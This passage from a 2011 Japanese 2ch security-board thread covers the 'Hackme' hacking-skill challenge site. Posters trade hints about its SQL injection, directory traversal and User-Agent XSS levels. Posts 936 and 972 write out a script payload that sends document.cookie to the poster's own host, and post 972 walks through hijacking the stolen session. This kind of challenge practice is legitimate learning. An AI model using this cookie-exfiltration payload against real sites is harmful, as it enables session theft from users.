【Hackme】ハッキング力検定サイトHackme

このエントリーをはてなブックマークに追加
916名無しさん@お腹いっぱい。
情報戦とかいいから改定前の正解晒せよ
917名無しさん@お腹いっぱい。:2011/02/25(金) 12:10:24.20
/Lv6/ だと /Lv5 に転送されるけど、
/Lv7/ だと 404 になるから、一応Lv6は存在するのかもしれない・・
918名無しさん@お腹いっぱい。:2011/02/25(金) 12:12:06.93
改定後の正解知ってるなら
改定前の正解とか簡単に予想つくんでは
919名無しさん@お腹いっぱい。:2011/02/25(金) 12:13:55.85
つーかcookieのセットすらできない連中がすでにLv4まできてるとか
凄まじいな
920名無しさん@お腹いっぱい。:2011/02/25(金) 12:14:24.93
>>916
改定後もそのまま正解だから晒せねーよ

まあ問題が「>>916のレスを表示せよ」で
要求したURLが
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916- では駄目で
http://hibari.2ch.net/test/read.cgi/sec/1297835390/916 のみが正解だった
理由は916-の方は分散して微妙に見難くなるから
まあその程度の理不尽
921名無しさん@お腹いっぱい。:2011/02/25(金) 12:17:19.36
いつの間にやらスレが埋まりそうな感じだな。
922名無しさん@お腹いっぱい。:2011/02/25(金) 12:18:26.19
999にLV4の答えを書く
923名無しさん@お腹いっぱい。:2011/02/25(金) 12:21:07.04
じゃあLV5のヒント:javascriptエラーがある
924名無しさん@お腹いっぱい。:2011/02/25(金) 12:32:11.77
>>923
具体的にどこに?
925名無しさん@お腹いっぱい。:2011/02/25(金) 12:44:06.38
まぁLv4に関してはもう答え晒されてるようなもんだしそろそろどっかの誰かがまた「晒されてますよ?」
って中の人にいうんじゃないかと・・・w
926名無しさん@お腹いっぱい:2011/02/25(金) 12:47:42.02
>>922
早くかけよ
927名無しさん@お腹いっぱい:2011/02/25(金) 12:48:38.21
>>922
早くかけよ
928名無しさん@お腹いっぱい:2011/02/25(金) 12:49:00.44
>>922
早くかけよ
929名無しさん@お腹いっぱい:2011/02/25(金) 12:49:45.96
>>922
早くかけよ
930名無しさん@お腹いっぱい:2011/02/25(金) 12:50:17.79
>>922
早くかけよ
931名無しさん@お腹いっぱい。:2011/02/25(金) 12:50:33.07
ネタバレって規約違反じゃね?
932名無しさん@お腹いっぱい:2011/02/25(金) 12:50:41.67
>>922
早くかけよ
933名無しさん@お腹いっぱい:2011/02/25(金) 12:51:02.83
>>922
早くかけよ
934名無しさん@お腹いっぱい:2011/02/25(金) 12:51:32.03
>>922
早くかけよ
935名無しさん@お腹いっぱい。:2011/02/25(金) 12:51:52.67
中の人も「やめて><」って言ってるくらいだしなw
正直ただでさえ楽っていうか分かりやすくになったのにこれ以上分からんとか言ってるのは1から勉強しなおせレベル。
936名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:39.54
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
937名無しさん@お腹いっぱい。:2011/02/25(金) 12:52:41.79
おい、あんまりいじめてやるなよw

埋め
938名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:35.82
まだ>>999になってないぞ。早漏め
939名無しさん@お腹いっぱい。:2011/02/25(金) 12:53:44.20
あーLv5いけたかも。
940名無しさん@お腹いっぱい。:2011/02/25(金) 12:54:40.80
>>939
それらしいヒントとかあった?
941名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:08.35
>>939
kwsk
942名無しさん@お腹いっぱい。:2011/02/25(金) 12:55:10.66
現在LV4総勢148人
↓増え続ける
943名無しさん@お腹いっぱい。:2011/02/25(金) 12:59:44.18
こんだネタバレあってわかんないのはそもそもxssとか名称だけしっててやってることは理解してないんだろうな
944名無しさん@お腹いっぱい。:2011/02/25(金) 13:00:11.30
やった、Lv4通ったー
昨日やって通らなかったはずのが通った
SQLインジェクションとかXSSとか名前だけ知ってる程度の知識だったけど、どういう仕組か理解できたわ
Lv3はUNIXすこし触ったことあったからすぐ理解できた

945名無しさん@お腹いっぱい。:2011/02/25(金) 13:02:16.45
Lv3についてはかなり初期の時点で誰かがディレクトリトラバーサルって単語漏らしたからググってクリアしたんだけど、あの人は全然叩かれないんだな
946名無しさん@お腹いっぱい。:2011/02/25(金) 13:03:01.82
ネタバレ起きてから合格しても同格とか思わないでほしいんで、その辺夜露死苦
947名無しさん@お腹いっぱい。:2011/02/25(金) 13:04:17.69
>>945
URLみたら誰でもすぐに思いつくことだからね。
あたり前のこととしてスルーされたんじゃね。
948名無しさん@お腹いっぱい。:2011/02/25(金) 13:09:14.95
あれみてディレクトリトラバーサルと思いつかないような奴は普通Lv3までいけないはずなんだよなww
tempとかUNIXそのまんまだし
949名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:03.75
ディレクトリトラバーサルはネタバレとはいえない
レベルのすぐ分かることだな。

レベル4でネタバレになったのはUAに突っ込むというアイデアだ。
自力で「ウホッ」と気付いたやつは自負していいレベルだけど
ここまできてもクリアできてないやつはもう本筋から離れたレベル。
自分が一番よく分かってるだろうw
950名無しさん@お腹いっぱい。:2011/02/25(金) 13:12:09.27
>>948
突っ込んでほしいのか?
951名無しさん@お腹いっぱい。:2011/02/25(金) 13:13:19.27
やっぱ時系列は上から下としか思えない
952名無しさん@お腹いっぱい。:2011/02/25(金) 13:15:01.66
lv5ェ・・・
953名無しさん@お腹いっぱい。:2011/02/25(金) 13:19:17.50
今見たら157人がLv4クリア
流石にだいぶ増えたな
954名無しさん@お腹いっぱい。:2011/02/25(金) 13:20:35.54
俺がuser-agentって書いた時点では10人ぐらいだったのになぁ
955名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:46.47
判定基準甘くなったからな・・・昨日ダメなのが今日は行けたし
956名無しさん@お腹いっぱい。:2011/02/25(金) 13:21:51.85
まぁ、所詮セキュ板の雑魚どものレベルなんてそんなもんだ
957名無しさん@お腹いっぱい。:2011/02/25(金) 13:23:00.68
>>955
そこらへんなんとかして欲しかったよな
958名無しさん@お腹いっぱい。:2011/02/25(金) 13:28:37.96
Lv2とLv4はそれぞれ2つか3つくらいのレベルに分けて
手法は同じでも
Lv2-easyはオーソドックスなパターン
Lv2-normalはちょっとひねったパターン
Lv2-hardは珍しいパターン
みたいにすればよかったのにね
これなら途中で判定基準変えたりして文句も言われなかったかも
959名無しさん@お腹いっぱい。:2011/02/25(金) 13:29:07.06
関係ないけどBackTrackのページの左側に勇気、力、決心って書いてあってワロタ
なんの意味があるんだろうか
960名無しさん@お腹いっぱい。:2011/02/25(金) 13:30:50.42
LV5は株式会社ネットファイアの製品netfire-v1の試験だな
961名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:15.37
ランキングの称号が「ハッカーの方々」から「仮免許ハッカーの人」になってるw
962名無しさん@お腹いっぱい。:2011/02/25(金) 13:31:32.84
この会社、煽ってくるぞw
963名無しさん@お腹いっぱい。:2011/02/25(金) 13:32:25.31
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?
ワロス
964名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:02.56
「仮免許ハッカー」です。なかなか。
やりますね。ちゃんと自前でできたかな?チートしちゃだめだよ?

クソ吹いたwwww
むしろ判定基準がチートだと思うがww
965名無しさん@お腹いっぱい。:2011/02/25(金) 13:33:56.24
中途半端にスクリプト通らないからもうややこしい
って会社が煽るなよwww
966名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:34.57
ネタバレ位想定できただろうにw、それで煽ってくるとかw
967名無しさん@お腹いっぱい。:2011/02/25(金) 13:34:45.56
ほんとだ、さっきまで
セキュリティ関係なら簡単かな?
みたいな感じのコメントだったのにwww
968名無しさん@お腹いっぱい。:2011/02/25(金) 13:38:00.62
これでまさかのlv5がランキングページ書き換えでした!とかだったらどうしよう・・・
969名無しさん@お腹いっぱい。:2011/02/25(金) 13:39:35.82
http://twitter.com/#!/passa/status/40993999892389888
ちょっと煽り過ぎた。反省。 #hackme
37秒前 twiccaから
970名無しさん@お腹いっぱい。:2011/02/25(金) 13:40:07.46
自鯖がいるようでいらない、sessionidなようでsessionidじゃない
971名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:31.68
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。
に変わったw
972名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:33.19
■LV4のクリア方法(ネタバレ)

firefoxのアドオンにCS LiteとUser Agent Switcherをインストールします。
んで、User Agent Switcherで新しいUser Agent(以下UA)を作り、User Agentの項目に
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
と書きます。
そのUAに設定して適当なID・PASSでログインします。
すると左下にセッションIDを盗みました的なAJAXウインドウが出てきます。
盗んだセッションをCS Liteアドオンを使って自分のブラウザのクッキーに登録します。
そして戻るボタンをクリックするとクリアできます。
973名無しさん@お腹いっぱい:2011/02/25(金) 13:43:35.67
974名無しさん@お腹いっぱい。:2011/02/25(金) 13:43:36.51
>>969
書き換わったw

「仮免許ハッカー」です。なかなか。
やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。


どうせならクリア時に、お手本を公開すればいいのになぁ(特にlv4)
昨日と今日で判定基準変わってるんだし
975名無しさん@お腹いっぱい。:2011/02/25(金) 13:44:39.65
結局昨日の答えはなんだったのか気になる。
最後に解答例とか出してほしいな
976名無しさん@お腹いっぱい。:2011/02/25(金) 13:45:07.12
>>969
何だこの子素直
977名無しさん@お腹いっぱい:2011/02/25(金) 13:46:01.77
978名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:08.75
煽るくらいならもっと柔軟性を持った判定にしろよなー
979名無しさん@お腹いっぱい。:2011/02/25(金) 13:48:28.11
かつてないほどセキュリティ板のアクセスが集中しております
980名無しさん@お腹いっぱい:2011/02/25(金) 13:48:57.15
だれか、lv2教えてくれ
981名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:36.12
>>980
SQLインジェクション
982名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:51.61
Lv2修正された?昨日よりやさしくなってるっぽいけど
983名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:20.11
今更LV2の答え教えても目立たないしな。
984名無しさん@お腹いっぱい:2011/02/25(金) 13:50:51.20
>>983
じゃ、おしえてくれ
985名無しさん@お腹いっぱい。:2011/02/25(金) 13:50:59.63
煽る煽るw
社員2ch張り付きすぎだろw
986名無しさん@お腹いっぱい。:2011/02/25(金) 13:51:26.73
>>981
そこはスレ嫁でいいんだよ
もう散々書かれてるんだから
987名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:02.20
そりゃここのスレは重要監視なんじゃね?
lv4も暫定停止フラグだなw
988名無しさん@お腹いっぱい。:2011/02/25(金) 13:52:34.99
本物のハッカーが163人もいるとか不自然だろ。
最初の2〜3人ぐらいが本物なんじゃね
989名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:33.19
>>988
俺もそう思うわ。
一応、昨日クリアしたけど、その時点でもちらほらヒントが出てたしなあ。
990名無しさん@お腹いっぱい。:2011/02/25(金) 13:54:42.78
■LV4のクリア方法(ネタバレ)

おくれましたが公開です。
まずページを開きます。
Explororのアドレス欄に次の文を打ち込みます→javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a);
あとでメッセージが出てくるのでそれを読みます。
ほとんどそこまでいけばクリアですよー!
991名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:08.53
LV2合格者って1万人ぐらいいるのかな?
992名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:13.74
こんなことだけでハッカーかどうかなんてわからんだろ
993名無しさん@お腹いっぱい。:2011/02/25(金) 13:55:28.55
判定が理不尽じゃなければ
Lv4までは解ける範囲だと思うけどなー
994名無しさん@お腹いっぱい:2011/02/25(金) 13:55:32.04
スレ読んでもわからん
995名無しさん@お腹いっぱい。:2011/02/25(金) 13:57:43.22
このサイトの公開初日にLv2クリアしてたの4人くらいだったな
その最初の4人はLv4でも名前あったからその人達は本当の知識と技術があるひとだな
996名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:17.04
>>994
諦めろ
997名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.63
クッキーの書き換えがわからん
その域に達していないらしい
lv3まではスイスイいけたんだが
webわかんね
998名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:27.62
LV4も再度やってみたけど、自分IPとdocument.cookieの文字が入ってれば
文法的に間違ってても正解になるみたいね
999名無しさん@お腹いっぱい。:2011/02/25(金) 13:58:42.77
>>994
それはさすがに勉強不足なだけなんじゃ・・・。
1000名無しさん@お腹いっぱい。:2011/02/25(金) 13:59:47.46
1000
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。